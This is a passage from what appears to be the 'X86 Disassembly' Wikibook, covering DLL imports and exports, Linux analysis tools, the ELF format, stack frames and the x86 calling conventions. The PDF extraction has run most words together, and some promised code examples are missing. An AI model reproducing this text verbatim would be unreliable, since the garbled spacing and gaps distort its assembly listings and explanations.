2.2.12 AlternateBoundImportStructure
2.2.13 WindowsDLLFiles
WindowsDLLfilesareabrandofPEfilewithafewkey
differences:
A.DLLfileextension
ADllMain()entrypoint,insteadofaWinMain()or
main().
TheDLLflagsetinthePEheader.
DLLsmaybeloadedinoneoftwoways,a)atload-time,
orb)bycallingtheLoadModule()Win32APIfunction.
FunctionExports
FunctionsareexportedfromaDLLfilebyusingthefol-
lowingsyntax:
__declspec(dllexport)voidMyFunction()...
The "__declspec” keyword here is not a C language
standard, but is implemented by many compilers to set
extendable, compiler-specific options for functions and
variables. MicrosoftCCompilerandGCCversionsthat
run on windows allow for the __declspec keyword, and
thedllexportproperty.
Functions may also be exported from regular .exe files,
and .exe files with exported functions may be called dy-
namically in a similar manner to .dll files. This is a rare
occurrence,however.
IdentifyingDLLExports
Thereareseveralwaystodeterminewhichfunctionsare
exported by a DLL. The method that this book will use
(often implicitly) is to use dumpbin in the following
manner:
dumpbin/EXPORTS<dllfile>
This will post a list of the function exports, along with
theirordinalandRVAtotheconsole.
FunctionImports
In a similar manner to function exports, a program may
importafunctionfromanexternalDLLfile. Thedllfile
32 CHAPTER 2. PLATFORMS
will load into the process memory when the program is
started, and the function will be used like a local func-
tion. DLLimportsneedtobeprototypedinthefollowing
manner,forthecompilerandlinkertorecognizethatthe
functioniscomingfromanexternallibrary:
__declspec(dllimport)voidMyFunction();
IdentifyingDLLImports
If is often useful to determine which functions are im-
ported from external libraries when examining a pro-
gram. To list import files to the console, use dumpbin
inthefollowingmanner:
dumpbin/IMPORTS<dllfile>
You can also use depends.exe to list imported and ex-
ported functions. Depends is a a GUI tool and comes
withMicrosoftPlatformSDK.
2.3 Linux
The Linux page of the X86 Disassembly Wikibook is a
stub. You can help by expanding this section.
2.3.1 Linux
TheGNU/Linux operating system is open source,
but at the same time there is so much that constitutes
“GNU/Linux”thatitcanbedifficulttostayontopofall
aspectsofthesystem. Herewewillattempttoboildown
someofthemostimportantconceptsoftheGNU/Linux
OperatingSystem,especiallyfromareverser’sstandpoint
2.3.2 SystemArchitecture
The concept of “GNU/Linux” is mostly a collection of
a large number of software components that are based
off the GNU tools and the Linux kernel. GNU/Linux is
itself broken into a number of variants called “distros”
whichsharesomesimilarities,butmayalsohavedistinct
peculiarities. In a general sense, all GNU/Linux distros
are based on a variant of the Linux kernel. However,
since each user may edit and recompile their own ker-
nelatwill,andsincesomedistrosmaymakecertainedits
totheirkernels,itishardtoproclaimanyoneversionof
anyonekernelas“thestandard”. Linuxkernelsaregen-
erallybasedoffthephilosophythatsystemconfiguration
detailsshouldbestoredinaptly-named,human-readable
(andthereforehuman-editable)configurationfiles.
TheLinuxkernelimplementsmuchofthecoreAPI,but
certainlynotallofit. MuchAPIcodeisstoredinexternalmodules(althoughusershavetheoptionofcompilingall
thesemodulestogetherintoa“MonolithicKernel”).
On top of the kernel generally runs one or more shells.
Bash is one of the more popular shells, but many users
preferothershells,especiallyfordifferenttasks.
Beyond the shell, Linux distros frequently offer a GUI
(although many distros do not have a GUI at all, usually
forperformancereasons).
SinceeachGUIoftensuppliesitsownunderlyingframe-
workandAPI,certaingraphicalapplicationsmayrunon
onlyoneGUI.Someapplicationsmayneedtoberecom-
piled(andafewcompletelyrewritten)torunonanother
GUI.
2.3.3 ConfigurationFiles
2.3.4 Shells
Herearesomepopularshells:
BashAnacronymfor“BourneAgainSHell.”
BourneAprecursortoBash.
CshCShell
KshKornShell
TCshATerminalorientedCsh.
ZshZShell
2.3.5 GUIs
Someofthemore-popularGUIs:
KDEKDesktopEnvironment
GNOME GNU Network Object Modeling Environ-
ment
2.3.6 Debuggers
gdbTheGNUDebugger. It comes pre-installed on
mostLinuxdistributionsandisprimarilyusedtode-
bugELFexecutables. manpage
winedbg A debugger for Wine, used to debug Win32
executablesunderLinux. manpage
edbAfullyfeaturedplugin-baseddebuggerinspiredby
thefamous OllyDbg.Projectpage
2.4. LINUX EXECUTABLE FILES 33
2.3.7 FileAnalyzers
stringsFinds printable strings in a file. When, for ex-
ample,apasswordisstoredinthebinaryitself(de-
finedstaticallyinthesource),thestringcanthenbe
extracted from the binary without ever needing to
executeit. manpage
fileDetermines a file type, useful for determining
whether an executable has been stripped and
whetherit’sbeendynamically(orstatically)linked.
manpage
objdump Disassemblesobjectfiles,executablesandli-
braries. Canlistinternalfilestructureanddisassem-
blespecificsections. SupportsbothIntelandAT&T
syntax
nmLists symbols from executable files. Doesn't work
onstrippedbinaries. Usedmostlyondebuggingver-
sionofexecutables.
2.4 LinuxExecutableFiles
The Linux Executable Files page of the X86 Disassembly
Wikibook is a stub. You can help by expanding this section.
2.4.1 ELFFiles
TheELF file format (short for Executable and Link-
ing Format) was developed by Unix System Laborato-
ries to be a successor to previous file formats such as
COFF and a.out. In many respects, the ELF format is
more powerful and versatile than previous formats, and
haswidelybecomethestandardonLinux,Solaris,IRIX,
and FreeBSD (although the FreeBSD-derived Mac OS
X uses the Mach-O format instead). ELF has also been
adoptedbyOpenVMSforItaniumandBeOSforx86.
Historically, Linux has not always used ELF; Red Hat
Linux4wasthefirsttimethatdistributionusedELF;pre-
viousversionshadusedthea.outformat.
ELF Objects are broken down into different segments
and/or sections. These can be located by using the ELF
header found at the first byte of the object. The ELF
headerprovidesthelocationforboththeprogramheader
and the section header. Using these data structures the
rest of the ELF objects contents can be found, this in-
cludes .text and .data segments which contain code and
datarespectively.
The GNU readelf utility, from the binutils package, is a
commontoolforparsingELFobjects.FileFormat
...
.data.rodata.textProgram header tableELF header
Section header table{{
An ELF file has two views: the program header shows the seg-
ments used at run-time, while the section header lists the set of
sections of the binary.
Each ELF file is made up of one ELF header, followed
byfiledata. Thefiledatacaninclude:
Programheadertable,describingzeroormoreseg-
ments
Section header table, describing zero or more sec-
tions
Datareferredtobyentriesintheprogramorsection
headertable
The segments contain information that is necessary for
runtime execution of the file, while sections contain im-
portantdataforlinkingandrelocation. Eachbyteinthe
entirefileistakenbynomorethanonesectionatatime,
buttherecanbeorphanbytes, whicharenotcoveredby
asection. InthenormalcaseofaUnixexecutableoneor
moresectionsareenclosedinonesegment.
2.4.2 RelocatableELFFiles
Relocatable ELF files are created by compilers. They
needtobelinkedbeforerunning.
Thosefilesareoftenfoundin.aarchives,witha.oexten-
sion.
2.4.3 a.outFiles
a.outis a very simple format consisting of a header (at
offset0)whichcontainsthesizeof3executablesections
34 CHAPTER 2. PLATFORMS
(code, data, bss), pluspointerstoadditionalinformation
such as relocations (for .o files), symbols and symbols’
strings. The actual sections contents follows the header.
Offsets of different sections are computed from the size
oftheprevioussection.
Thea.outformatisnowrarelyused.
FileFormat
Chapter3
CodePatterns
3.1 TheStack
3.1.1 TheStack
Pop Push
Generallyspeaking,a stackisadatastructurethatstores
data values contiguously in memory. Unlike an array,
however,youaccess(readorwrite)dataonlyatthe“top”
ofthestack. Toreadfromthestackissaid" topop"and
to write to the stack is said " to push". A stack is also
known as a LIFO queue (Last In First Out) since values
are popped from the stack in the reverse order that they
are pushed onto it (think of how you pile up plates on a
table). Poppeddatadisappearsfromthestack.
All x86 architectures use a stack as a temporary storage
area in RAM that allows the processor to quickly store
andretrievedatainmemory. Thecurrenttopofthestack
ispointedtobythe espregister. Thestack“grows”down-
ward, from high to low memoryaddresses, so values re-
cently pushed onto the stack are located in memory ad-
dresses abovethe esp pointer. No register specifically
pointstothebottomofthestack,althoughmostoperating
systemsmonitorthestackboundstodetectboth“under-
flow”(poppinganemptystack)and“overflow”(pushing
toomuchinformationonthestack)conditions.
Whenavalueispoppedoffthestack, thevalueremains
sittinginmemoryuntiloverwritten. However,youshould
neverrelyonthecontentofmemoryaddressesbelowesp,becauseotherfunctionsmayoverwritethesevalueswith-
outyourknowledge.
Users of Windows ME, 98, 95, 3.1 (and earlier) may
fondly remember the infamous “Blue Screen of Death”
--thatwassometimescausedbyastackoverflowexcep-
tion. This occurs when too much data is written to the
stack, and the stack “grows” beyond its limits. Modern
operating systems use better bounds-checking and error
recoverytoreducetheoccurrenceofstackoverflows,and
tomaintainsystemstabilityafteronehasoccurred.
3.1.2 PushandPop
ThefollowinglinesofASMcodearebasicallyequivalent:
but the single command actually performs much faster
than the alternative. It can be visualized that the stack
grows from right to left, and esp decreases as the stack
growsinsize.
3.1.3 ESPInAction
Let’s say we want to quickly discard 3 items we pushed
earlierontothestack,withoutsavingthevalues(inother
words“clean”thestack). Thefollowingworks:
popeaxpopeaxpopeax
However there is a faster method. We can simply per-
formsomebasicarithmeticonesptomakethepointergo
“above”thedataitems,sotheycannotbereadanymore,
andcanbeoverwrittenwiththenextroundof pushcom-
mands.
addesp,12;12is3DWORDs(4bytes*3)
Likewise,ifwewanttoreserveroomonthestackforan
item bigger than a DWORD, we can use a subtraction
35
36 CHAPTER 3. CODE PATTERNS
toartificiallymoveespforward. Wecanthenaccessour
reservedmemorydirectlyasamemorypointer,orwecan
accessitindirectlyasanoffsetvaluefromespitself.
Say we wanted to create an array of byte values on the
stack,100itemslong. Wewanttostorethepointertothe
base of this array in edi. How do we do it? Here is an
example:
sub esp, 100 ; num of bytes in our array mov edi, esp ;
copyaddressof100bytesareatoedi
Todestroythatarray,wesimplywritetheinstruction
addesp,100
3.1.4 ReadingWithoutPopping
Toreadvaluesonthestackwithoutpoppingthemoffthe
stack,espcan be used with an offset. For instance, to
readthe3DWORDvaluesfromthetopofthestackinto
eax (but without using a pop instruction), we would use
theinstructions:
mov eax, DWORD PTR SS:[esp] mov eax, DWORD
PTRSS:[esp+4]moveax,DWORDPTRSS:[esp+8]
Remember, since esp moves downward as the stack
grows, data on the stack can be accessed with a posi-
tive offset. A negative offset should never be used be-
causedata“above”thestackcannotbecountedontostay
the way you left it. The operation of reading from the
stack without popping is often referred to as “peeking”,
but since this isn't the official term for it this wikibook
won'tuseit.
3.1.5 DataAllocation
There are two areas in the computer memory where a
program can store data. The first, the one that we have
beentalkingabout,isthestack. ItisalinearLIFObuffer
that allows fast allocations and deallocations, but has a
limitedsize. The heapistypicallyanon-lineardatastor-
agearea,typicallyimplementedusinglinkedlists,binary
trees, or other more exotic methods. Heaps are slightly
more difficult to interface with and to maintain than a
stack, and allocations/deallocations are performed more
slowly. However,heapscangrowasthedatagrows,and
newheapscanbeallocatedwhendataquantitiesbecome
toolarge.
Asweshallsee,explicitlydeclaredvariablesareallocated
on the stack. Stack variables are finite in number, and
have a definite size. Heap variables can be variable in
numberandinsize. Wewilldiscussthesetopicsinmore
detaillater.3.2 FunctionsandStackFrames
3.2.1 FunctionsandStackFrames
To allow for many unknowns in the execution envi-
ronment, functions are frequently set up with a " stack
frame"toallowaccesstobothfunctionparameters,and
automatic function variables. The idea behind a stack
frameisthateachsubroutinecanactindependentlyofits
locationonthestack,andeachsubroutinecanactasifit
isthetopofthestack.
Whenafunctioniscalled,anewstackframeiscreatedat
the currentesplocation. A stack frame acts like a par-
tition on the stack. All items from previous functions
are higher up on the stack, and should not be modified.
Eachcurrentfunctionhasaccesstotheremainderofthe
stack,fromthestackframeuntiltheendofthestackpage.
Thecurrentfunctionalwayshasaccesstothe“top”ofthe
stack,andsofunctionsdonotneedtotakeaccountofthe
memoryusageofotherfunctionsorprograms.
3.2.2 StandardEntrySequence
Formanycompilers,thestandardfunctionentrysequence
isthefollowingpieceofcode( Xisthetotalsize,inbytes,
ofall automaticvariablesusedinthefunction):
pushebpmovebp,espsubesp,X
Forexample,hereisaCfunctioncodefragmentandthe
resultingassemblyinstructions:
voidMyFunction(){inta,b,c;...
_MyFunction: pushebp;savethevalueofebpmovebp,
esp;ebpnowpointstothetopofthestacksubesp,12;
spaceallocatedonthestackforthelocalvariables
Thismeanslocalvariablescanbeaccessedbyreferencing
ebp. ConsiderthefollowingCcodefragmentandcorre-
spondingassemblycode:
a=10;b=5;c=2;
mov[ebp- 4], 10; locationofvariablea mov[ebp- 8],
5;locationofbmov[ebp-12],2;locationofc
Thisallseemswellandgood,butwhatisthepurposeof
ebpinthissetup? Whysavetheoldvalueofebpandthen
pointebptothetopofthestack,onlytochangethevalue
of esp with the next instruction? The answer is function
parameters .
ConsiderthefollowingCfunctiondeclaration:
voidMyFunction2(intx,inty,intz){... }
3.2. FUNCTIONS AND STACK FRAMES 37
Itproducesthefollowingassemblycode:
_MyFunction2: push ebp mov ebp, esp sub esp, 0 ; no
localvariables,mostcompilerswillomitthisline
Which is exactly as one would expect. So, what ex-
actlydoesebpdo,andwherearethefunctionparameters
stored? Theanswerisfoundwhenwecallthefunction.
ConsiderthefollowingCfunctioncall:
MyFunction2(10,5,2);
This will create the following assembly code (using
a Right-to-Left calling convention called CDECL, ex-
plainedlater):
push2push5push10call_MyFunction2
Note:Rememberthatthe callx86instructionisbasically
equivalentto
pusheip+2; returnaddressiscurrentaddress+sizeof
twoinstructionsjmp_MyFunction2
Itturnsoutthatthefunctionargumentsareallpassedon
the stack! Therefore, when we move the current value
of the stack pointer ( esp) intoebp, we are pointing ebp
directlyatthefunctionarguments. Asthefunctioncode
pushes and pops values, ebp is not affected by esp. Re-
memberthatpushingbasicallydoesthis:
sub esp, 4 ; “allocate” space for the new stack item mov
[esp],X;putnewstackitemvalueXin
This means that first the return address and then the old
valueofebpareputonthestack. Therefore[ebp]points
tothelocationoftheoldvalueofebp,[ebp+4]pointsto
thereturnaddress,and[ebp+8]pointstothefirstfunc-
tion argument. Here is a (crude) representation of the
stackatthispoint:
: : |2|[ebp+16](3rdfunctionargument)|5|[ebp+12]
(2ndargument)|10|[ebp+8](1stargument)|RA|[ebp
+4](returnaddress)|FP|[ebp](oldebpvalue)||[ebp-
4](1stlocalvariable): : : : ||[ebp-X](esp-thecurrent
stackpointer. Theuseofpush/popisvalidnow)
Thestackpointervaluemaychangeduringtheexecution
ofthecurrentfunction. Inparticularthishappenswhen:
parametersarepassedtoanotherfunction;
thepseudo-function“alloca()"isused.
[FIXME:Whenparametersarepassedintoanotherfunc-
tion the esp changing is not an issue. When that func-
tion returns the esp will be back to its old value. So
why does ebp help there. This needs better explana-
tion. (The real explanation is here, ESP is not really
needed:http://blogs.msdn.com/larryosterman/archive/2007/03/12/fpo.aspx )] This means that the value of esp
cannotbereliablyusedtodetermine(usingtheappropri-
ate offset) the memory location of a specific local vari-
able. Tosolvethisproblem,manycompilersaccesslocal
variables using negative offsets from the ebpregisters.
This allows us to assume that the same offset is always
usedtoaccessthesamevariable(orparameter). Forthis
reason, the ebp register is called the framepointer , or
FP.
3.2.3 StandardExitSequence
TheStandardExitSequencemustundothethingsthatthe
Standard Entry Sequence does. To this effect, the Stan-
dardExitSequencemustperformthefollowingtasks,in
thefollowingorder:
1.Remove space for local variables, by reverting esp
toitsoldvalue.
2.Restoretheoldvalueof ebptoitsoldvalue,which
isontopofthestack.
3.Returntothecallingfunctionwitha retcommand.
Asanexample,thefollowingCcode:
void MyFunction3(int x, int y, int z) { int a, int b, int c;
... return;}
Willcreatethefollowingassemblycode:
_MyFunction3: push ebp mov ebp, esp sub esp, 12 ;
sizeof(a)+sizeof(b)+sizeof(c);x=[ebp+8],y=[ebp
+12],z=[ebp+16];a=[ebp-4]=[esp+8],b=[ebp
-8]=[esp+4],c=[ebp-12]=[esp]movesp,ebppop
ebpret12;sizeof(x)+sizeof(y)+sizeof(z)
3.2.4 Non-StandardStackFrames
Frequently, reversers will come across a subroutine that
doesn't set up a standard stack frame. Here are some
thingstoconsiderwhenlookingatasubroutinethatdoes
notstartwithastandardsequence:
UsingUninitializedRegisters
When a subroutine starts using data in an uninitialized
register, that means that the subroutine expects external
functionstoputdataintothatregisterbeforeitgetscalled.
Somecallingconventionspassargumentsinregisters,but
sometimesacompilerwillnotuseastandardcallingcon-
vention.
38 CHAPTER 3. CODE PATTERNS
“static”Functions
InC,functionsmayoptionallybedeclaredwiththe static
keyword,assuch:
staticvoidMyFunction4();
Thestatickeyword causes a function to have only lo-
calscope, meaningitmaynotbeaccessedbyanyexter-
nalfunctions(itisstrictlyinternaltothegivencodefile).
Whenanoptimizingcompilerseesastaticfunctionthatis
only referenced by calls (no references through function
pointers), it “knows” that external functions cannot pos-
siblyinterfacewiththestaticfunction(thecompilercon-
trols all access to the function), so the compiler doesn't
bothermakingitstandard.
HotPatchPrologue
SomeWindowsfunctionssetuparegularstackframeas
explained above, but start out with the apparently non-
sensicalline
movedi,edi;
Thisinstructionisassembledinto2byteswhichserveasa
placeholderforfuturefunctionpatches. Takenasawhole
suchafunctionmightlooklikethis:
nop ; each nop is 1 byte long nop nop nop nop FUNC-
TION: ; <-- This is the function entry point as used by
call instructions mov edi, edi ; mov edi,edi is 2 bytes
longpushebp;regularstackframesetupmovebp,esp
Ifsuchafunctionneedstobereplacedwithoutreloading
theapplication(orrestartingthemachineincaseofker-
nelpatches)itcanbeachievedbyinsertingajumptothe
replacement function. A short jump instruction (which
canjump+/-127bytes)requires2bytesofstoragespace
-justtheamountthatthe“movedi,edi”placeholderpro-
vides. A jump to any memory location, in this case to
our replacement function, requires 5 bytes. These are
provided by the 5 no-operation bytes just preceding the
function. Ifafunctionthuspatchedgetscalleditwillfirst
jumpbackby5bytesandthendoalongjumptothere-
placement function. After the patch the memory might
looklikethis
LABEL: jmp REPLACEMENT_FUNCTION ; <-- 5
NOPsreplacedbyjmpFUNCTION:jmpshortLABEL
;<--movedihasbeenreplacedbyshortjumpbackwards
pushebpmovebp,esp;<--regularstackframesetupas
before
The reason for using a 2-byte mov instruction at the be-
ginninginsteadofputting5nopstheredirectly,istopre-
ventcorruptionduringthepatchingprocess. Therewould
beariskwithreplacing5individualinstructionsifthein-structionpointeriscurrentlypointingatanyoneofthem.
Usingasinglemovinstructionasplaceholderontheother
handguaranteesthatthepatchingcanbecompletedasan
atomictransaction.
3.2.5 LocalStaticVariables
Localstaticvariablescannotbecreatedonthestack,since
thevalueofthevariableispreservedacrossfunctioncalls.
We'lldiscusslocalstaticvariablesandothertypesofvari-
ablesinalaterchapter.
3.3 Functions and Stack Frame
Examples
3.3.1 Example:NumberofParameters
Given the following disassembled function (in MASM
syntax), how many 4-byte parameters does this function
receive? How many variables are created on the stack?
Whatdoesthisfunctiondo?
_Question1: pushebpmovebp,espsubesp,4moveax,
[ebp + 8] mov ecx, 2 mul ecx mov [esp + 0], eax mov
eax, [ebp + 12] mov edx, [esp + 0] add eax, edx mov
esp,ebppopebpret
The function above takes 2 4-byte parameters, accessed
byoffsets+8and+12fromebp. Thefunctionalsohas1
variablecreatedonthestack,accessedbyoffset+0from
esp. ThefunctionisnearlyidenticaltothisCcode:
intQuestion1(intx,inty){intz;z=x*2;returny+z;
}
3.3.2 Example:StandardEntrySequences
Does the following function follow the Standard Entry
andExitSequences? ifnot,wheredoesitdiffer?
_Question2: call_SubQuestion2movecx,2mulecxret
Thefunctiondoesnotfollowthestandardentrysequence,
because it doesn't set up a proper stack frame with ebp
andesp. ThefunctionbasicallyperformsthefollowingC
instructions:
intQuestion2(){returnSubQuestion2()*2;}
3.4. CALLING CONVENTIONS 39
Althoughanoptimizingcompilerhaschosentotakeafew
shortcuts.
3.4 CallingConventions
3.4.1 CallingConventions
Callingconventions areastandardizedmethodforfunc-
tions to be implemented and called by the machine. A
calling convention specifies the method that a compiler
setsup to access a subroutine. In theory, code from any
compilercanbeinterfacedtogether,solongasthefunc-
tions all have the same calling conventions. In practice
however,thisisnotalwaysthecase.
Callingconventionsspecifyhowargumentsarepassedto
a function, how return values are passed back out of a
function,howthefunctioniscalled,andhowthefunction
managesthestackanditsstackframe. Inshort,thecall-
ingconventionspecifieshowafunctioncallinCorC++
is converted into assembly language. Needless to say,
there are many ways for this translation to occur, which
iswhyit’ssoimportanttospecifycertainstandardmeth-
ods. Ifthesestandardconventionsdidnotexist,itwould
benearlyimpossibleforprogramscreatedusingdifferent
compilerstocommunicateandinteractwithoneanother.
There are three major calling conventions that are used
with the C language on 32-bit x86 processors: STD-
CALL, CDECL, and FASTCALL. In addition, there
is another calling convention typically used with C++:
THISCALL.[1]There are other calling conventions as
well, including PASCAL and FORTRAN conventions,
among others. We will not consider those conventions
inthisbook.
Other processors, such as AMD64 processors (also
called x86-64 processors), each have their own calling
convention.[2][3]
3.4.2 NotesonTerminology
Thereareafewtermsthatwearegoingtobeusinginthis
chapter,whicharemostlycommonsense, butwhichare
worthyofstatingdirectly:
Passingarguments “passing arguments” is a way of
sayingthatthecallingfunctioniswritingdatainthe
place where the called function will look for them.
Arguments are passed before the callinstruction is
executed.
Right-to-LeftandLeft-to-Right These describe the
mannerthatargumentsarepassedtothesubroutine,in terms of the High-level code. For instance, the
followingCfunctioncall:
MyFunction1(a,b);
willgeneratethefollowingcodeifpassedLeft-to-Right:
pushapushbcall_MyFunction
and will generate the following code if passed Right-to-
Left:
pushbpushacall_MyFunction
Returnvalue Some functions return a value, and that
value must be received reliably by the function’s
caller. The called function places its return value
inaplacewherethecallingfunctioncangetitwhen
executionreturns. Thecalledfunctionstoresthere-
turnvaluebeforeexecutingthe retinstruction.
Cleaningthestack When arguments are pushed onto
the stack, eventually they must be popped back off
again. Whichever function, the caller or the callee,
is responsible for cleaning the stack must reset the
stackpointertoeliminatethepassedarguments.
Callingfunction(thecaller) The “parent” function
that calls the subroutine. Execution resumes in the
calling function directly after the subroutine call,
unlesstheprogramterminatesinsidethesubroutine.
Calledfunction(thecallee) The “child” function that
getscalledbythe“parent.”
NameDecoration WhenCcodeistranslatedtoassem-
bly code, the compiler will often “decorate” the
functionnamebyaddingextrainformationthatthe
linker will use to find and link to the correct func-
tions. For most calling conventions, the decoration
is very simple (often only an extra symbol or two
to denote the calling convention), but in some ex-
tremecases(notablyC++“thiscall”convention),the
namesare“mangled”severely.
Entrysequence(thefunctionprologue) a few in-
structions at the beginning of a function, which
prepare the stack and registers for use within the
function.
Exitsequence(thefunctionepilogue) a few instruc-
tionsattheendofafunction,whichrestorethestack
andregisterstothestateexpectedbythecaller,and
returntothecaller. Somecallingconventionsclean
thestackintheexitsequence.
40 CHAPTER 3. CODE PATTERNS
Callsequence afewinstructionsinthemiddleofafunc-
tion (the caller) which pass the arguments and call
the called function. After the called function has
returned, some calling conventions have one more
instructioninthecallsequencetocleanthestack.
3.4.3 StandardCCallingConventions
The C language, by default, uses the CDECL calling
convention, but most compilers allow the programmer
to specify another convention via a specifier keyword.
These keywords arenotpart of the ISO-ANSI C stan-
dard,soyoushouldalwayscheckwithyourcompilerdoc-
umentationaboutimplementationspecifics.
IfacallingconventionotherthanCDECListobeused,
or if CDECL is not the default for your compiler, and
you want to manually use it, you must specify the call-
ingconventionkeywordinthefunctiondeclarationitself,
andinanyprototypesforthefunction. Thisisimportant
becauseboththecallingfunctionandthecalledfunction
needtoknowthecallingconvention.
CDECL
IntheCDECLcallingconventionthefollowingholds:
ArgumentsarepassedonthestackinRight-to-Left
order,andreturnvaluesarepassedineax.
Thecallingfunction cleans the stack. This allows
CDECLfunctionstohave variable-length argument
lists(aka variadic functions). For this reason the
number of arguments is not appended to the name
of the function by the compiler, and the assembler
and the linker are therefore unable to determine if
anincorrectnumberofargumentsisused.
Variadic functions usually have special entry code, gen-
eratedbytheva_start(),va_arg()Cpseudo-functions.
ConsiderthefollowingCinstructions:
_cdeclintMyFunction1(inta,intb){returna+b;}
andthefollowingfunctioncall:
x=MyFunction1(2,3);
Thesewouldproducethefollowingassemblylistings,re-
spectively:
_MyFunction1: pushebpmovebp,espmoveax,[ebp+
8]movedx,[ebp+12]addeax,edxpopebpret
and
push3push2call_MyFunction1addesp,8When translated to assembly code, CDECL functions
are almost always prepended with an underscore (that’s
whyallpreviousexampleshaveused"_”intheassembly
code).
STDCALL
STDCALL, also known as “WINAPI” (and a few other
names,dependingonwhereyouarereadingit)isusedal-
mostexclusivelybyMicrosoftasthestandardcallingcon-
vention for the Win32 API. Since STDCALL is strictly
definedbyMicrosoft, allcompilersthatimplementitdo
itthesameway.
STDCALL passes arguments right-to-left, and re-
turns the value in eax. (The Microsoft documenta-
tionerroneouslyclaimedthatargumentsarepassed
left-to-right,butthisisnotthecase.)
Thecalledfunctioncleansthestack,unlikeCDECL.
This means that STDCALL doesn't allow variable-
lengthargumentlists.
ConsiderthefollowingCfunction:
_stdcallintMyFunction2(inta,intb){returna+b;}
andthecallinginstruction:
x=MyFunction2(2,3);
These will produce the following respective assembly
codefragments:
:_MyFunction2@8pushebpmovebp,espmoveax,[ebp
+8]movedx,[ebp+12]addeax,edxpopebpret8
and
push3push2call_MyFunction2@8
Thereareafewimportantpointstonotehere:
1.Inthefunctionbody,the retinstructionhasan(op-
tional) argument that indicates how many bytes to
popoffthestackwhenthefunctionreturns.
2.STDCALL functions are name-decorated with a
leadingunderscore,followedbyan@,andthenthe
number(inbytes)ofargumentspassedonthestack.
Thisnumberwillalwaysbeamultipleof4,ona32-
bitalignedmachine.
FASTCALL
The FASTCALL calling convention is not completely
standard across all compilers, so it should be used with
caution. In FASTCALL, the first 2 or 3 32-bit (or
3.4. CALLING CONVENTIONS 41
smaller)argumentsarepassedinregisters,withthemost
commonly used registers being edx, eax, and ecx. Ad-
ditionalarguments, orargumentslarger than4-bytes are
passed on the stack, often in Right-to-Left order (simi-
lar to CDECL). The calling function most frequently is
responsibleforcleaningthestack,ifneeded.
Because of the ambiguities, it is recommended that
FASTCALL be used only in situations with 1, 2, or 3
32-bitarguments,wherespeedisessential.
ThefollowingCfunction:
_fastcallintMyFunction3(inta,intb){returna+b;}
andthefollowingCfunctioncall:
x=MyFunction3(2,3);
Willproducethefollowingassemblycodefragmentsfor
thecalled,andthecallingfunctions,respectively:
:@MyFunction3@8 push ebp mov ebp, esp ;many
compilers create a stack frame even if it isn't used add
eax,edx;aisineax,bisinedxpopebpret
and
;the calling function mov eax, 2 mov edx, 3 call @My-
Function3@8
ThenamedecorationforFASTCALLprependsan@to
the function name, and follows the function name with
@x,wherexisthenumber(inbytes)ofargumentspassed
tothefunction.
Many compilers still produce a stack frame for FAST-
CALL functions, especially in situations where the
FASTCALL function itself calls another subroutine.
However,ifaFASTCALLfunctiondoesn'tneedastack
frame,optimizingcompilersarefreetoomitit.
3.4.4 C++CallingConvention
C++requiresthatnon-staticmethodsofaclassbecalled
byaninstanceoftheclass. Thereforeitusesitsownstan-
dardcallingconventiontoensurethatpointerstotheob-
jectarepassedtothefunction: THISCALL .
THISCALL
InTHISCALL,thepointertotheclassobjectispassedin
ecx,theargumentsarepassedRight-to-Leftonthestack,
andthereturnvalueispassedineax.
Forinstance,thefollowingC++instruction:
MyObj.MyMethod(a,b,c);
Wouldformthefollowingasmcode:movecx,MyObjpushcpushbpushacall_MyMethod
Atleast,it wouldlookliketheassemblycodeaboveifit
weren'tfornamemangling .
NameMangling
Because of the complexities inherent in function over-
loading,C++functionsareheavilyname-decoratedtothe
point that people often refer to the process as “Name
Mangling.” Unfortunately C++ compilers are free to do
the name-mangling differently since the standard does
notenforceaconvention. Additionally,otherissuessuch
asexceptionhandlingarealsonotstandardized.
Since every compiler does the name-mangling differ-
ently,thisbookwillnotspendtoomuchtimediscussing
thespecificsofthealgorithm. Noticethatinmanycases,
it’spossibletodeterminewhichcompilercreatedtheexe-
cutablebyexaminingthespecificsofthename-mangling
format. We will not cover this topic in this much depth
inthisbook,however.
HereareafewgeneralremarksaboutTHISCALLname-
mangledfunctions:
Theyarerecognizableonsightbecauseoftheircom-
plexity when compared to CDECL, FASTCALL,
andSTDCALLfunctionnamedecorations
Theysometimesincludethenameofthatfunction’s
class.
Theyalmostalwaysincludethenumberandtypeof
the arguments, so that overloaded functions can be
differentiatedbytheargumentspassedtoit.
HereisanexampleofaC++classandfunctiondeclara-
tion:
class MyClass { MyFunction(int a); } My-
Class::MyFunction(2){}
Andhereistheresultantmangledname:
?MyFunction@MyClass@@QAEHH@Z
Extern“C”
In a C++ source file, functions placed in an extern “C”
blockareguaranteednottobemangled. Thisisdonefre-
quentlywhenlibrariesarewritteninC++, andthefunc-
tions need to be exported without being mangled. Even
thoughtheprogramiswritteninC++andcompiledwith
a C++ compiler, some of the functions might therefore
notbemangledandwilluseoneoftheordinaryCcalling
conventions(typicallyCDECL).
42 CHAPTER 3. CODE PATTERNS
3.4.5 NoteonNameDecorations
We'vebeendiscussingnamedecorationsinthischapter,
butthefactisthatinpuredisassembledcodetheretypi-
callyarenonameswhatsoever,especiallynotnameswith
fancydecorations. Theassemblystageremovesallthese
readableidentifiers,andreplacesthemwiththebinarylo-
cationsinstead. Functionnamesreallyonlyappearintwo
places:
1.Listingfilesproducedduringcompilation
2.Inexporttables,iffunctionsareexported
Whendisassemblingrawmachinecode,therewillbeno
functionnamesandnonamedecorationstoexamine. For
thisreason,youwillneedtopaymoreattentiontotheway
parametersarepassed,thewaythestackiscleaned,and
othersimilardetails.
While we haven't covered optimizations yet, suffice it to
saythatoptimizingcompilerscanevenmakeamessout
ofthesedetails. Functionswhicharenotexporteddonot
necessarilyneedtomaintainstandardinterfaces,andifit
isdeterminedthataparticularfunctiondoesnotneedto
followastandardconvention,someofthedetailswillbe
optimizedaway. Inthesecases,itcanbedifficulttodeter-
minewhatcallingconventionswereused(ifany), andit
isevendifficulttodeterminewhereafunctionbeginsand
ends. This book cannot account for all possibilities, so
wetrytoshowasmuchinformationaspossible,withthe
knowledge that much of the information provided here
willnotbeavailableinatruedisassemblysituation.
3.4.6 Furtherreading
x86Disassembly/CallingConventionExamples
Embedded Systems/Mixed C and Assembly Pro-
gramming describes calling conventions on other
CPUs.
[1]JoshLospinoso. “Commonx86CallingConventions” .
[2]“Ctoassemblycallconvention32bitvs64bit” .
[3]“ASMcallconventions” .
3.5 CallingConventionExamples
3.5.1 MicrosoftCCompiler
HereisasimplefunctioninC:
intMyFunction(intx,inty){return(x*2)+(y*3);}Using cl.exe, we are going to generate 3 separate list-
ingsforMyFunction,onewithCDECL,onewithFAST-
